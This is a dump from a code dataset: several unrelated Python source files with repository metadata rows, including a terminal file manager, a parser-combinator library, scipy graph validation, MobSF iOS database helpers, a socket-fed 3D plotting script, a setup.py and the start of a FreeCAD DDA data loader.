main = urwid.MainLoop(self._toplevel, self._PALETTE,
unhandled_input=self._unhandled_input)
main.screen.set_terminal_properties(bright_is_bold=False)
main.run()
def _open(self, folder: Gio.File):
"""
Open a folder.
"""
children = folder.enumerate_children(
','.join([Gio.FILE_ATTRIBUTE_STANDARD_IS_HIDDEN,
Gio.FILE_ATTRIBUTE_STANDARD_IS_BACKUP,
Gio.FILE_ATTRIBUTE_STANDARD_NAME,
FileItem.FILE_ATTRIBUTES]),
Gio.FileQueryInfoFlags.NONE, None)
self._path_bar.location = folder
del self._files[:]
for info in children:
if self._show_hidden or not (info.get_is_hidden() or
info.get_is_backup()):
self._files.append(FileItem(folder.get_child(info.get_name()),
info))
list.sort(self._files, key=attrgetter('name_key'))
def _open_focused(self):
"""
Open the focused folder.
"""
focus = self._files.get_focus()[0]
if (focus is not None and
focus.info.get_file_type() == Gio.FileType.DIRECTORY):
self._open(focus.file)
def _trash_focused(self):
"""
Move the focused file to the Trash.
"""
focus = self._files.get_focus()[0]
if focus is None:
return
dialog = Dialog(
_("Are you sure you want to move \"{}\" to the Trash?").format(
focus.info.get_display_name()),
[(_("Cancel"), 'cancel'), (_("Move to Trash"), 'trash')])
def on_response(response_id):
if response_id == 'trash':
focus.file.trash(None)
del self._files[self._files.index(focus)]
self._toplevel.show_dialog(dialog, on_response)
def _unhandled_input(self, key):
"""
Handle application key commands.
"""
if urwid.command_map[key] == 'cursor left':
# Open previous folder in the path.
if self._path_bar.previous is not None:
self._open(self._path_bar.previous)
elif urwid.command_map[key] == 'cursor right':
# Open next folder in the path.
if self._path_bar.next is not None:
self._open(self._path_bar.next)
elif urwid.command_map[key] == 'activate':
self._open_focused()
elif key == 'delete':
self._trash_focused()
elif key == 'meta h':
self._show_hidden = not self._show_hidden
self._open(self._path_bar.location)
elif key in ('Q', 'q'):
raise urwid.ExitMainLoop
|
gpl-3.0
| 5,710,978,842,891,577,000
| 36.753846
| 78
| 0.556031
| false
| 3.987002
| false
| false
| false
|
loehnertj/bsbgateway
|
bsbgateway/util/jos_parser.py
|
1
|
15340
|
##############################################################################
#
# Copyright (C) Johannes Loehnert, 2013-2015
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import re
__all__ = [
"Token", "AstNode", "ParserContext", "StackTrace",
"seq", "multiple", "optional", "anyof",
"generate_lexer", "re", "generate_parser",
]
class Token(object):
ntype=0
content=None
srcoffset = 0
def __init__(o, ntype, content=None, srcoffset=0):
o.ntype = ntype
o.content = content
o.srcoffset = srcoffset
def __unicode__(o):
if not o.content:
return o.ntype
content = o.content
if not isinstance(content, unicode):
content = unicode(content)
if len(content)> 40:
content = content[:37] + u"..."
return unicode(o.ntype) + u"<" + content.replace("\n", "\n ") + u">"
def __str__(o):
if not o.content:
return o.ntype
content = o.content
if not isinstance(content, str):
content = str(content) # may throw encode error!!!
if len(content)> 40:
content = content[:37] + "..."
return o.ntype + "<" + content.replace("\n", "\n ") + ">"
__repr__ = __str__
def __call__(o):
return o.content
class AstNode:
"""represents a node of the abstract syntax tree
sequence is a list of the children. Its items
can be Tokens and AstNodes, mixing is allowed.
Take care: a single Token object is a valid tree!!
The tree structure will match the given grammar.
"""
ntype = ""
_children = None
def __init__(o, ntype, children):
o.ntype = ntype
o._children = children
def __str__(o):
s = o.ntype
for c in o._children:
s = s + "\n" + str(c).replace("\n", "\n ")
return s
def __unicode__(o):
s = unicode(o.ntype)
for c in o._children:
s = s + u"\n" + unicode(c).replace("\n", "\n ")
return s
def __getattr__(o, ntype):
"""gets the child node(s) having the given ntype.
Returns list of children that matches."""
result = []
for c in o._children:
if c.ntype == ntype:
result.append(c)
return result
def __iter__(o):
"""iterates over the children of this node."""
return o._children.__iter__()
def __call__(o):
"""return token content of this subtree.
The subtree must contain 0 or 1 token, multiple tokens cause an Exception.
Returns token.content (None if no token is there)."""
result = [c() for c in o._children]
result = [x for x in result if x is not None]
if len(result)>1:
raise ValueError("More than one token in subtree '%s'"%o.ntype)
if len(result)==0: return None
return result[0]
def __getitem__(o, key):
if isinstance(key, basestring):
l = o.__getattr__(key)
if len(l) > 1: raise ValueError("more than one %s child"%key)
if len(l)==0: return None
return l[0]
else:
return o._children[key]
content = property(__call__)
class ParserContext:
def __init__(o, tokens, ruleset):
o.tokens = tokens
o.ruleset = ruleset.copy()
o.stack_trace = None
o.stack = []
def push(o, symbol):
'''processor should push HIS OWN name before calling subprocessors, and .pop() afterwards.'''
o.stack.append(symbol)
def pop(o):
o.stack.pop()
def mktrace(o, symbol, errdescription="", reached_position=-1):
"""create a stack trace and remember it if a bigger position was reached."""
trace = StackTrace(o.stack+[symbol], errdescription, reached_position)
# remember the trace if there is none remembered, if it reached longer than the last one,
# or if it extends the last remembered one.
if o.stack_trace is None \
or o.stack_trace.reached_position < trace.reached_position:
o.stack_trace = trace
return trace
class StackTrace:
stack = []
reached_position =-1
errdescription = ""
def __init__(o, stack, errdescription="", reached_position=-1):
o.stack = stack[:]
o.errdescription = errdescription
o.reached_position = reached_position
def __str__(o):
return " ".join(o.stack) + " : '" + o.errdescription + "' (@token %d"%o.reached_position + ")"
def _convert(args):
"""reads the given list and replaces all strings with the corresponding _expect processor.
"""
processors = list()
for processor in args:
# replace strings by the '_expect' processor.
if isinstance(processor, basestring):
processor = _expect(processor)
processors.append(processor)
return processors
# Processors: ==========================================================
# each of those functions returns a processor for the token stream.
#def process(pcontext, position):
# trys to apply itself onto the tokens, if needed branches to another rule.
# it starts at position (index into tokens).
# Returns (partlist, new_position):
# partlist := LIST of AstNodes and Tokens
# StackTrace if not applicable.
# new_position: where further parsing must continue
def _expect(text):
"""Expect processor: if text is lowercase, expect something matching that rule.
if text is not lowercase, expect a token with that ntype.
You do not need to use it directly. All strings given as argument to another processor are directly matched.
"""
if text != text.lower():
# expect that particular TOKEN
def process(pcontext, position):
tokens = pcontext.tokens
if len(tokens) > position:
token = tokens[position]
else:
# after end of stream there comes an infinite amount of EOF tokens.
token = Token("EOF", None)
if token.ntype == text:
return [token], position+1
else:
return pcontext.mktrace("expect", errdescription="expected %s token"%text, reached_position=position), position
else:
# try whether the RULE applies
def process(pcontext, position):
pcontext.push("<%s>"%text)
result, new_position = _try_rule(pcontext, position, text)
pcontext.pop()
if isinstance(result, StackTrace):
return result, position
else:
return [result], new_position
return process
def seq(*args):
"""sequence processor: match the full sequence given as arguments."""
processors = _convert(args)
def process(pcontext, position):
result = []
start_position = position
for processor in processors:
subresult, position = processor(pcontext, position)
if isinstance(subresult, StackTrace):
# parsing failed further down.
# exception here: pass Stacktrace directly!
return subresult, start_position
else:
# append returned list to my result
result += subresult
#success
return result, position
return process
def multiple(*args):
"""multiple processor: match the sequence given as arguments n times (n>=0).
"""
subseq = seq(*args)
def process(pcontext, position):
result = []
while True:
pcontext.push("multiple")
subresult, new_position = subseq(pcontext, position)
pcontext.pop()
if isinstance(subresult, StackTrace):
# ignore trace and return what you got so far
break;
# detect and break endless loop
if len(subresult) == 0:
subresult = pcontext.mktrace("multiple", errdescription="endless loop detected", reached_position = position)
break;
result += subresult
position = new_position
return result, position
return process
def optional(*args):
"""optional processor: match the full sequence given as argument, or empty list"""
subseq = seq(*args)
def process(pcontext, position):
pcontext.push("optional")
subresult, new_position = subseq(pcontext, position)
pcontext.pop()
# only thing we have to do is convert StackTrace (no match) into a valid match.
if isinstance(subresult, StackTrace):
return [], position
else:
return subresult, new_position
return process
def anyof(*args):
"""anyof processor: try the given processors in turn, return the first match.
for alternative sequences, wrap them in seq(...).
"""
processors = _convert(args)
if len(processors)==0:
raise ArgumentError, "at least one alternative must be given to anyof"
def process(pcontext, position):
for processor in processors:
pcontext.push("anyof")
result, new_position = processor(pcontext, position)
pcontext.pop()
if not isinstance(result, StackTrace):
return result, new_position
# nothing matched
return pcontext.mktrace("anyof", "no alternative matched", position), position
return process
# END of processor generators! ============================
def _try_rule(pcontext, position, rulename):
""" takes a list of Tokens, the ruleset, and the name of the subtree rule.
Returns the AST (tree of AstNodes and/or tokens), or StackTrace if parsing failed.
"""
processor = pcontext.ruleset[rulename]
result, new_position = processor(pcontext, position)
if isinstance(result, StackTrace):
return result, position
else:
return AstNode(rulename, result), new_position
def generate_lexer(symbols, re_flags):
"""generates a lexer function for the given symbol set.
The symbol set is a list: ["SYMBOL1", "regex1", "SYMBOL2", "regex2", (...)].
Internally, re.Scanner is used. Look up the re module docs for regexp syntax.
Applied to a source string, the lexer function returns a list of Tokens, ie.
Token objects.
Use the empty string "" as symbol for symbols to be ignored (e.g. whitespace).
No Tokens are generated for those.
Mark the content of the token by a capture group in the regexp. If there is
a named group "content", it is set as Token content. If not, the first
capture group is set as Token content. If there are no capture groups,
content will be None.
Known Bug: the first regex will always have a capture group, by default the
whole match. If you want a token without content, put () at the end to
make the first capture group an empty string.
"""
# factory that returns a specific token-generator.
def factory(ntype, has_value):
def mktoken(regex, match):
if has_value:
# From the construction of the regex, the group having the
# index of the named group +1 is our value.
content = match.group(regex.groupindex[ntype] + 1)
else:
content = None
t = Token(ntype, content, match.start())
return t
return mktoken
regexs = []
symnames = []
funcs = {}
for sym, regex in zip(symbols[::2], symbols[1::2]):
if sym == "":
regexs.append("r(%s)"%(sym))
else:
symnames.append(sym)
regexs.append(r"(?P<%s>%s)"%(sym, regex))
# check if the regex defines groups i.e. delivers a value
p = re.compile(regex)
funcs[sym] = factory(sym, (p.groups>0))
regex = re.compile("|".join(regexs), re_flags)
def lexer(text):
tokens = []
lastpos = 0
for match in regex.finditer(text):
# find matched symbol
groups = match.groupdict()
for sym in symnames:
if groups[sym]:
tokens.append(funcs[sym](regex, match))
break;
lastpos = match.end()
return tokens, text[lastpos:]
return lexer
def generate_parser(ruleset, entrypoint=""):
"""generates a parser for the given grammar (ruleset).
The ruleset must be a dictionary with:
string keys (rulenames), which MUST be lowercase
processor or string values.
values:
processors are callbacks built by nesting the functions seq, multiple, optional, anyof.
string values match either another rule (if lowercase) or one token (if not lowercase).
In the latter case, the string value is compared against the Token.ntype.
by default, the rule "" (empty string as key) is used as entrypoint. You can give another
entrypoint for testing parts of the grammar.
"""
rules = ruleset.copy()
# convert string values into _expect
for key in rules.keys():
if isinstance(rules[key], basestring):
rules[key] = _expect(rules[key])
def parse(tokens):
""" takes a list of Tokens.
Returns (tree, pcontext) -
tree: the AST (tree of AstNodes and/or tokens), or None if parsing failed.
NOTE that a single Token is also a valid tree.
pcontext: final state of parsing contest (for error location)
.stack_trace: a StackTrace object if parsing failed
.stack_trace.stack: list of called operators
.stack_trace.reached_position: where the parser failed to continue
use it to validate if everything was read, or for error messages.
"""
pcontext = ParserContext(tokens, rules)
result, end_position = _try_rule(pcontext, 0, "")
if isinstance(result, StackTrace):
result = None
print pcontext.stack_trace
else:
pcontext.stack_trace = None
return result, pcontext
return parse
|
gpl-3.0
| -6,327,910,968,418,215,000
| 36.93401
| 127
| 0.574185
| false
| 4.427128
| false
| false
| false
|
beiko-lab/gengis
|
bin/Lib/site-packages/scipy/sparse/csgraph/_validation.py
|
1
|
2475
|
from __future__ import division, print_function, absolute_import
import numpy as np
from scipy.sparse import csr_matrix, isspmatrix, isspmatrix_csc, isspmatrix_csr
from ._tools import csgraph_to_dense, csgraph_from_dense,\
csgraph_masked_from_dense, csgraph_from_masked
DTYPE = np.float64
def validate_graph(csgraph, directed, dtype=DTYPE,
csr_output=True, dense_output=True,
copy_if_dense=False, copy_if_sparse=False,
null_value_in=0, null_value_out=np.inf,
infinity_null=True, nan_null=True):
"""Routine for validation and conversion of csgraph inputs"""
if not (csr_output or dense_output):
raise ValueError("Internal: dense or csr output must be true")
# if undirected and csc storage, then transposing in-place
# is quicker than later converting to csr.
if (not directed) and isspmatrix_csc(csgraph):
csgraph = csgraph.T
if isspmatrix(csgraph):
if csr_output:
csgraph = csr_matrix(csgraph, dtype=DTYPE, copy=copy_if_sparse)
else:
csgraph = csgraph_to_dense(csgraph, null_value=null_value_out)
elif np.ma.is_masked(csgraph):
if dense_output:
mask = csgraph.mask
csgraph = np.array(csgraph.data, dtype=DTYPE, copy=copy_if_dense)
csgraph[mask] = null_value_out
else:
csgraph = csgraph_from_masked(csgraph)
else:
if dense_output:
csgraph = csgraph_masked_from_dense(csgraph,
copy=copy_if_dense,
null_value=null_value_in,
nan_null=nan_null,
infinity_null=infinity_null)
mask = csgraph.mask
csgraph = np.asarray(csgraph.data, dtype=DTYPE)
csgraph[mask] = null_value_out
else:
csgraph = csgraph_from_dense(csgraph, null_value=null_value_in,
infinity_null=infinity_null,
nan_null=nan_null)
if csgraph.ndim != 2:
raise ValueError("compressed-sparse graph must be two dimensional")
if csgraph.shape[0] != csgraph.shape[1]:
raise ValueError("compressed-sparse graph must be shape (N, N)")
return csgraph
|
gpl-3.0
| 2,765,522,862,928,460,300
| 40.672414
| 79
| 0.560404
| false
| 4.004854
| false
| false
| false
|
MobSF/Mobile-Security-Framework-MobSF
|
mobsf/StaticAnalyzer/views/ios/db_interaction.py
|
1
|
7363
|
"""Module holding the functions for the db."""
import logging
from django.conf import settings
from mobsf.MobSF.utils import python_dict, python_list
from mobsf.StaticAnalyzer.models import StaticAnalyzerIOS
from mobsf.StaticAnalyzer.models import RecentScansDB
logger = logging.getLogger(__name__)
def get_context_from_db_entry(db_entry):
"""Return the context for IPA/ZIP from DB."""
try:
logger.info('Analysis is already Done. Fetching data from the DB...')
context = {
'version': settings.MOBSF_VER,
'title': 'Static Analysis',
'file_name': db_entry[0].FILE_NAME,
'app_name': db_entry[0].APP_NAME,
'app_type': db_entry[0].APP_TYPE,
'size': db_entry[0].SIZE,
'md5': db_entry[0].MD5,
'sha1': db_entry[0].SHA1,
'sha256': db_entry[0].SHA256,
'build': db_entry[0].BUILD,
'app_version': db_entry[0].APP_VERSION,
'sdk_name': db_entry[0].SDK_NAME,
'platform': db_entry[0].PLATFORM,
'min_os_version': db_entry[0].MIN_OS_VERSION,
'bundle_id': db_entry[0].BUNDLE_ID,
'bundle_url_types': python_list(db_entry[0].BUNDLE_URL_TYPES),
'bundle_supported_platforms':
python_list(db_entry[0].BUNDLE_SUPPORTED_PLATFORMS),
'icon_found': db_entry[0].ICON_FOUND,
'info_plist': db_entry[0].INFO_PLIST,
'binary_info': python_dict(db_entry[0].BINARY_INFO),
'permissions': python_list(db_entry[0].PERMISSIONS),
'ats_analysis': python_list(db_entry[0].ATS_ANALYSIS),
'binary_analysis': python_list(db_entry[0].BINARY_ANALYSIS),
'macho_analysis': python_dict(db_entry[0].MACHO_ANALYSIS),
'ios_api': python_dict(db_entry[0].IOS_API),
'code_analysis': python_dict(db_entry[0].CODE_ANALYSIS),
'file_analysis': python_list(db_entry[0].FILE_ANALYSIS),
'libraries': python_list(db_entry[0].LIBRARIES),
'files': python_list(db_entry[0].FILES),
'urls': python_list(db_entry[0].URLS),
'domains': python_dict(db_entry[0].DOMAINS),
'emails': python_list(db_entry[0].EMAILS),
'strings': python_list(db_entry[0].STRINGS),
'firebase_urls': python_list(db_entry[0].FIREBASE_URLS),
'appstore_details': python_dict(db_entry[0].APPSTORE_DETAILS),
}
return context
except Exception:
logger.exception('Fetching from DB')
def get_context_from_analysis(app_dict,
info_dict,
code_dict,
bin_dict,
all_files):
"""Get the context for IPA/ZIP from analysis results."""
try:
context = {
'version': settings.MOBSF_VER,
'title': 'Static Analysis',
'file_name': app_dict['file_name'],
'app_name': info_dict['bin_name'],
'app_type': bin_dict['bin_type'],
'size': app_dict['size'],
'md5': app_dict['md5_hash'],
'sha1': app_dict['sha1'],
'sha256': app_dict['sha256'],
'build': info_dict['build'],
'app_version': info_dict['bundle_version_name'],
'sdk_name': info_dict['sdk'],
'platform': info_dict['pltfm'],
'min_os_version': info_dict['min'],
'bundle_id': info_dict['id'],
'bundle_url_types': info_dict['bundle_url_types'],
'bundle_supported_platforms':
info_dict['bundle_supported_platforms'],
'icon_found': app_dict['icon_found'],
'info_plist': info_dict['plist_xml'],
'binary_info': bin_dict['bin_info'],
'permissions': info_dict['permissions'],
'ats_analysis': info_dict['inseccon'],
'binary_analysis': bin_dict['bin_code_analysis'],
'macho_analysis': bin_dict['checksec'],
'ios_api': code_dict['api'],
'code_analysis': code_dict['code_anal'],
'file_analysis': all_files['special_files'],
'libraries': bin_dict['libraries'],
'files': all_files['files_short'],
'urls': code_dict['urlnfile'],
'domains': code_dict['domains'],
'emails': code_dict['emailnfile'],
'strings': bin_dict['strings'],
'firebase_urls': code_dict['firebase'],
'appstore_details': app_dict['appstore'],
}
return context
except Exception:
logger.exception('Rendering to Template')
def save_or_update(update_type,
app_dict,
info_dict,
code_dict,
bin_dict,
all_files):
"""Save/Update an IPA/ZIP DB entry."""
try:
values = {
'FILE_NAME': app_dict['file_name'],
'APP_NAME': info_dict['bin_name'],
'APP_TYPE': bin_dict['bin_type'],
'SIZE': app_dict['size'],
'MD5': app_dict['md5_hash'],
'SHA1': app_dict['sha1'],
'SHA256': app_dict['sha256'],
'BUILD': info_dict['build'],
'APP_VERSION': info_dict['bundle_version_name'],
'SDK_NAME': info_dict['sdk'],
'PLATFORM': info_dict['pltfm'],
'MIN_OS_VERSION': info_dict['min'],
'BUNDLE_ID': info_dict['id'],
'BUNDLE_URL_TYPES': info_dict['bundle_url_types'],
'BUNDLE_SUPPORTED_PLATFORMS':
info_dict['bundle_supported_platforms'],
'ICON_FOUND': app_dict['icon_found'],
'INFO_PLIST': info_dict['plist_xml'],
'BINARY_INFO': bin_dict['bin_info'],
'PERMISSIONS': info_dict['permissions'],
'ATS_ANALYSIS': info_dict['inseccon'],
'BINARY_ANALYSIS': bin_dict['bin_code_analysis'],
'MACHO_ANALYSIS': bin_dict['checksec'],
'IOS_API': code_dict['api'],
'CODE_ANALYSIS': code_dict['code_anal'],
'FILE_ANALYSIS': all_files['special_files'],
'LIBRARIES': bin_dict['libraries'],
'FILES': all_files['files_short'],
'URLS': code_dict['urlnfile'],
'DOMAINS': code_dict['domains'],
'EMAILS': code_dict['emailnfile'],
'STRINGS': bin_dict['strings'],
'FIREBASE_URLS': code_dict['firebase'],
'APPSTORE_DETAILS': app_dict['appstore'],
}
if update_type == 'save':
db_entry = StaticAnalyzerIOS.objects.filter(
MD5=app_dict['md5_hash'])
if not db_entry.exists():
StaticAnalyzerIOS.objects.create(**values)
else:
StaticAnalyzerIOS.objects.filter(
MD5=app_dict['md5_hash']).update(**values)
except Exception:
logger.exception('Updating DB')
try:
values = {
'APP_NAME': info_dict['bin_name'],
'PACKAGE_NAME': info_dict['id'],
'VERSION_NAME': info_dict['bundle_version_name'],
}
RecentScansDB.objects.filter(
MD5=app_dict['md5_hash']).update(**values)
except Exception:
logger.exception('Updating RecentScansDB')
|
gpl-3.0
| -1,673,612,552,239,371,300
| 41.316092
| 77
| 0.528317
| false
| 3.674152
| false
| false
| false
|
Shatki/PyIMU
|
test/magnetosphere.py
|
1
|
1580
|
from mpl_toolkits.mplot3d import axes3d
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.animation import FuncAnimation
from socket import *
import time
# Объявляем все глобальные переменные
HOST = '192.168.0.76'
PORT = 21566
BUFSIZ = 512
ADDR = (HOST, PORT)
bad_packet = 0
good_packet = 0
# fig, ax = plt.subplots()
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
# Socket
# tcpCliSock = socket(AF_INET, SOCK_STREAM)
# tcpCliSock.connect(ADDR)
# Запрет на ожидание
plt.ion()
tstart = time.time()
# real-time plotting loop
X, Y, Z = [], [], []
while True:
try:
# читаем данные из сети
tcpCliSock.c
data = tcpCliSock.recv(BUFSIZ)
if data:
print(len(X), data)
data = data.decode().split(',')
if len(data) == 9:
# print('Data received', data)
# tcpCliSock.send(b'Ok')
good_packet += 1
else:
bad_packet += 1
# читаем данные из сети
data = tcpCliSock.recv(BUFSIZ)
X.append(data[0])
Y.append(data[1])
Z.append(data[2])
frame = ax.scatter(X, Y, Z, c='b', marker='o')
# Remove old line collection before drawing
#if oldcol is not None:
# ax.collections.remove(oldcol)
plt.pause(0.001 / len(X))
except KeyboardInterrupt:
tcpCliSock.close()
print('FPS: %f' % (len(X) / (time.time() - tstart)))
break
|
gpl-3.0
| -736,870,472,682,010,900
| 21.328358
| 60
| 0.574866
| false
| 2.888031
| false
| false
| false
|
embray/astropy_helpers
|
setup.py
|
1
|
2069
|
#!/usr/bin/env python
# Licensed under a 3-clause BSD style license - see LICENSE.rst
import ah_bootstrap
import pkg_resources
from setuptools import setup
from astropy_helpers.setup_helpers import register_commands, get_package_info
from astropy_helpers.version_helpers import generate_version_py
NAME = 'astropy_helpers'
VERSION = '1.1.dev'
RELEASE = 'dev' not in VERSION
DOWNLOAD_BASE_URL = 'http://pypi.python.org/packages/source/a/astropy-helpers'
generate_version_py(NAME, VERSION, RELEASE, False, uses_git=not RELEASE)
# Use the updated version including the git rev count
from astropy_helpers.version import version as VERSION
cmdclass = register_commands(NAME, VERSION, RELEASE)
# This package actually doesn't use the Astropy test command
del cmdclass['test']
setup(
name=pkg_resources.safe_name(NAME), # astropy_helpers -> astropy-helpers
version=VERSION,
description='Utilities for building and installing Astropy, Astropy '
'affiliated packages, and their respective documentation.',
author='The Astropy Developers',
author_email='astropy.team@gmail.com',
license='BSD',
url='http://astropy.org',
long_description=open('README.rst').read(),
download_url='{0}/astropy-helpers-{1}.tar.gz'.format(DOWNLOAD_BASE_URL,
VERSION),
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Framework :: Setuptools Plugin',
'Framework :: Sphinx :: Extension',
'Framework :: Sphinx :: Theme',
'License :: OSI Approved :: BSD License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Topic :: Software Development :: Build Tools',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: System :: Archiving :: Packaging'
],
cmdclass=cmdclass,
zip_safe=False,
**get_package_info(exclude=['astropy_helpers.tests'])
)
|
bsd-3-clause
| 1,800,023,496,086,649,600
| 38.037736
| 78
| 0.672789
| false
| 4.129741
| false
| false
| false
|
lainegates/DDA
|
loadDataTools.py
|
1
|
41566
|
# coding=gbk
#***************************************************************************
#* *
#* Copyright (c) 2009, 2010 *
#* Xiaolong Cheng <lainegates@163.com> *
#* *
#* This program is free software; you can redistribute it and/or modify *
#* it under the terms of the GNU Lesser General Public License (LGPL) *
#* as published by the Free Software Foundation; either version 2 of *
#* the License, or (at your option) any later version. *
#* for detail see the LICENCE text file. *
#* *
#* This program is distributed in the hope that it will be useful, *
#* but WITHOUT ANY WARRANTY; without even the implied warranty of *
#* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *
#* GNU Library General Public License for more details. *
#* *
#* You should have received a copy of the GNU Library General Public *
#* License along with this program; if not, write to the Free Software *
#* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 *
#* USA *
#* *
#***************************************************************************
import FreeCADGui
from PyQt4 import QtCore , QtGui
import Base
from Base import showErrorMessageBox
import DDADatabase
def checkFileExists(path):
import os
if not os.path.isfile(path):
showErrorMessageBox("FileError" , "File \"%s\" doesn't exist"%path)
return False
return True
class FileReader():
'''
read files , this class will omit the blank lines
'''
def __init__(self):
self.__fileName = None
self.__file = None
def setFile(self, fileName):
self.__fileName = fileName
try:
self.__file = open(self.__fileName , 'rb')
except:
showErrorMessageBox('file open error' , fileName + ' open failed')
return False
return True
def getNextLine(self):
line = self.__file.readline()
while len(line)!=0:
line = line.strip()
if len(line)==0: # blank line with '\n'
line = self.__file.readline()
else:
break # this line is not blank
if len(line)==0: # file already ends
import Base
Base.showErrorMessageBox('file error' , 'unvalid data')
raise
return line
def closeFile(self):
self.__file.close()
class Block:
def __init__(self):
self.blockIndex = 0 # the index of this block
self.startNo = 0
self.endNo = 0
self.vertices = []
self.parameters = []
self.stressX = 0
self.stressY = 0
self.stressXY = 0
self.materialNo = 0 # used in dc result
# count how many hole points are on this block
self.holePointsCount = 0
def getPoints(self):
return [(t[1],t[2],0) for t in self.vertices]
def visible(self):
if self.holePointsCount>0:
return False
elif self.holePointsCount==0:
return True
else :
raise Exception('unvalid value %f'% self.holePointsCount)
class DDALine:
def __init__(self , p1 , p2 , materialNo):
self.startPoint = p1
self.endPoint = p2
self.materialNo = materialNo
self.visible = True
class BoltElement(DDALine):
def __init__(self , p1 , p2 , e , t , f):
DDALine.__init__(self, p1, p2, 0)
self.e = e
self.t = t
self.f = f
class DDAPolyLine:
def __init__(self , pts , materialNo):
self.pts = pts
self.materialNo = materialNo
self.visible = True
class DDAPoint:
def __init__(self , x=0 , y=0):
self.x = x
self.y = y
self.Xspeed = 0
self.Yspeed = 0
self.blockNo = 0
self.visible = True
class FixedPoint(DDAPoint):
pass
class LoadingPoint(DDAPoint):
pass
class MeasuredPoint(DDAPoint):
def __init__(self):
DDAPoint.__init__(self)
self.u = 0
self.v = 0
self.r = 0
self.stressX = 0
self.stressY = 0
self.stressXY = 0
class HolePoint(DDAPoint):
pass
class Graph:
def __init__(self):
self.blocks = []
self.fixedPoints = []
self.measuredPoints = []
self.loadingPoints = []
self.holePoints = []
self.boltElements = []
def reset(self):
self.blocks = []
self.fixedPoints = []
self.measuredPoints = []
self.loadingPoints = []
self.boltElements = []
class BaseParseData():
'''
parse data loaded , data may be DL data , DC data etc.
'''
def parse(self , filename):
'''
abstract function , overwrited by subclass
'''
pass
def parseFloatNum(self , numStr , itemName='None'):
try:
num = float(numStr)
except:
try:
num = int(numStr)
except:
showErrorMessageBox( 'InputError' , itemName + ' should be a float number')
return None
return num
def parseIntNum(self , numStr , itemName='None'):
try:
num = int(numStr)
except:
showErrorMessageBox( 'InputError' , itemName + ' should be a integer')
return None
return num
class ParseAndLoadDLData(BaseParseData):
'''
parse DL data
'''
def __init__(self):
self.reset()
self.__fileReader = FileReader()
def GetResources(self):
return {
'Pixmap' : 'LoadDLInput',
'MenuText': 'LoadDCInputData',
'ToolTip': "Load DC Input Data"}
def Activated(self):
from Base import __currentProjectPath__
if self.parse(__currentProjectPath__ + '/data.dl'):
self.save2Database()
import Base
Base.changeStep4Stage('ShapesAvailable')
def reset(self):
self.checkStatus = False
self.__miniLength = 0
self.__jointSetNum = 0
self.__boundaryNodeNum = 0
self.__tunnelNum = 0
self.__addtionalLineNum = 0
self.__materialLineNum = 0
self.__boltElementNum = 0
self.__fixedPointNum = 0
self.__loadingPointNum = 0
self.__measuredPointNum = 0
self.__holePointNum = 0
self.__jointSets = []
self.__slope = []
self.__boundaryNodes = []
self.__tunnels = []
self.__additionalLines = []
self.__materialLines = []
self.__boltElements = []
self.__fixedPoints = []
self.__loadingPoints = []
self.__measuredPoints = []
self.__holePoints = []
def parse(self , filename ):
'''
parse DL data
:param filename: the data file name
'''
self.reset()
if not self.__fileReader.setFile(filename):
return False
if not self.__parsePandect():
return False
if not self.__parseJointSets():
return False
if not self.__parseBoundaryNodes():
return False
if not self.__parseTunnels():
return False
if not self.__parseLines():
return False
if not self.__parsePoints():
return False
self.__fileReader.closeFile()
return True
def __parseJointSets(self):
'''
parse joint sets
'''
# joint dip , dip direction
for i in range(self.__jointSetNum):
self.__jointSets.append(range(6))
tmpNums = self.__jointSets[-1]
str = self.__fileReader.getNextLine()
nums = str.strip().split()
tmpNums[0] = self.parseFloatNum(nums[0], 'joint dip')
tmpNums[1] = self.parseFloatNum(nums[1], 'dip direction')
if tmpNums[0] == None or tmpNums[1] == None :
return False
print 'joint %d : ( %f , %f)'%( i , tmpNums[0],tmpNums[1])
# slope dip , dip direction
tmpNumbers = [0 , 1]
str = self.__fileReader.getNextLine()
nums = str.strip().split()
tmpNumbers[0] = self.parseFloatNum(nums[0], 'slope dip')
tmpNumbers[1] = self.parseFloatNum(nums[1], 'dip direction')
if tmpNumbers[0] == None or tmpNumbers[1] == None :
return False
print 'slope : ( %f , %f)'%(tmpNumbers[0],tmpNumbers[1])
self.__slope.append((tmpNumbers[0],tmpNumbers[1]))
for i in range(self.__jointSetNum):
tmpNums = self.__jointSets[i]
str = self.__fileReader.getNextLine()
nums = str.strip().split()
tmpNums[2] = self.parseFloatNum(nums[0], 'spacing')
tmpNums[3] = self.parseFloatNum(nums[1], 'length')
tmpNums[4] = self.parseFloatNum(nums[2], 'bridge')
tmpNums[5] = self.parseFloatNum(nums[3], 'random')
if tmpNums[2] == None or tmpNums[3] == None or tmpNums[4] == None or tmpNums[5] == None :
return False
print 'joint %d parameter : ( %f , %f , %f , %f)'%(i , tmpNums[2],tmpNums[3],tmpNums[4],tmpNums[5])
return True
def __parseBoundaryNodes(self ):
'''
parse boundary nodes
'''
for i in range(self.__boundaryNodeNum):
str = self.__fileReader.getNextLine()
nums = str.strip().split()
tmpNums = [0 , 1 , 0]
tmpNums[0] = self.parseFloatNum(nums[0], 'coordinate number')
tmpNums[1] = self.parseFloatNum(nums[1], 'coordinate number')
if tmpNums[0] == None or tmpNums[1] == None :
return False
print 'boundary line %d : (%f , %f)'%(i , tmpNums[0] , tmpNums[1])
self.__boundaryNodes.append(tmpNums)
return True
def __parseTunnels(self ):
'''
parse tunnels
'''
for i in range(self.__tunnelNum):
# tunnel shape number
str = self.__fileReader.getNextLine()
shapeNo = self.parseIntNum(str, 'tunnel shape number')
if shapeNo == None :
return False
# tunnel a b c r
tmpNums = range(4)
str = self.__fileReader.getNextLine()
names = ['a' , 'b' , 'c' , 'r']
